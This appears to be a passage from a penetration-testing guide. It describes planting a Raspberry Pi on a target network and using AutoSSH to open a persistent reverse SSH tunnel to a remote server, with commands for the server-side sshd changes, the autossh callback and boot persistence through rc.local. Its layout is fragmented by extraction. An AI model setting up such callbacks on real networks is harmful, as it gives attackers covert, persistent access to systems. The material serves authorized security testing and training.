For a persistent reverse SSH connection, you can use AutoSSH to set up an SSH session via a wired connection on the target network, or if you've taken the time to set up a 3G connection with USB, it can run completely wireless. AutoSSH is a package that enables you to create persistent outbound SSH connections from the Raspberry Pi to a server that you control sitting somewhere on the Internet. When the Raspberry Pi boots and has a network connection, either wired or 3G, it will automatically call home and establish a secure session to the device.
Follow this example to install and configure AutoSSH on your Kali instance. This can be used to access and carry out your attacks from a remote location.
apt-get
command to install the latest version of autossh from the repository:#apt-get install autossh
To set up AutoSSH, we'll need to make configuration changes on both sides: the Raspberry Pi and the server side where you will be controlling the remote device from.
etc/ssh/ssh_host_rsa_key.pub
. Cat this file and grab the output starting with ssh-rsa
through user@host
.authorized_hosts
file in the ~/.ssh/
directory. To accomplish this, switch to this directory and then add the key using the echo
command.
AllowTCPForwarding (yes) |
TCP forwarding on the SSH daemon to facilitate the connection of the remote shell to a local port. |
GatewayPorts (yes) |
When you use TCP forwarding, the default behavior is to only listen on the loopback address (127.0.0.1). This option enables you to directly connect to this reverse shell from off-box, say, your laptop. |
/etc/ssh
and locate your sshd_config
file.We will be using a similar technique to add the configuration changes into this file with the echo
command.
sshd_config
file, you will need to restart the SSHD service:#cd /etc/ssh #echo "AllowTCPForwarding yes" >> sshd_config #echo "GatewayPorts yes" >> sshd_config #service ssh restart
You should get the following result:
autossh
command, which will build the outbound tunnel and bind it to your server in the cloud:#autossh –M 10000 –N –f –R 1337:localhost:22 [email protected]
In this example, -M
is the local port that autossh will run on, -N
tells it not to execute a remote command (from SSH), -f
(from SSH) tells it to run in the background, and -R
is the remote port and will bind it to localhost
on port 22
, the default SSH port. The last parameter tells it to connect to our remote host using the root account.
This information should be changed to reflect the IP or hostname where your server is running.
|
The local port |
|
This means that you should not execute a command |
|
Runs in the background |
|
Port forwarding from |
|
The defined user and IP address or hostname of the remote server |
–p
flag—1337
for this example—and connect to the reverse shell sent by the Raspberry Pi. This shell is more interactive than what we had with the netcat
shell since it's a full SSH tunnel. This is probably advantageous if you do this frequently with the Raspberry Pi during penetration tests.etc/rc.local
file so that every time the server boots, the session will be established. To complete this task, you will need a text editor, such as vi or nano. The rc.local
file contains a line at the end of the file which must remain the last item. This prevents us from just appending to the end of the file, as shown in previous examples:#vi /etc/rc.local
exit 0
. Use i
to insert a line. Copy and paste the autossh
command you generated previously. Press Esc to exit the insert mode, and finally, enter :wq
to write the file and quit.If you need some additional persistence of the tunnel, there are some additional flags you can set, such as ServerAliveInterval
and ServerAliveCountMax
, which will send traffic over your SSH tunnel to help ensure that it isn't cut down by a firewall between the Raspberry Pi and the remote server.
Since we enabled GatewayPorts earlier in the SSHD configuration file, you can also connect to this shell directly, SSHing to the IP address of your server followed by the port you specified. In this case, this would look like the following command:
#ssh root@lambda –p 1337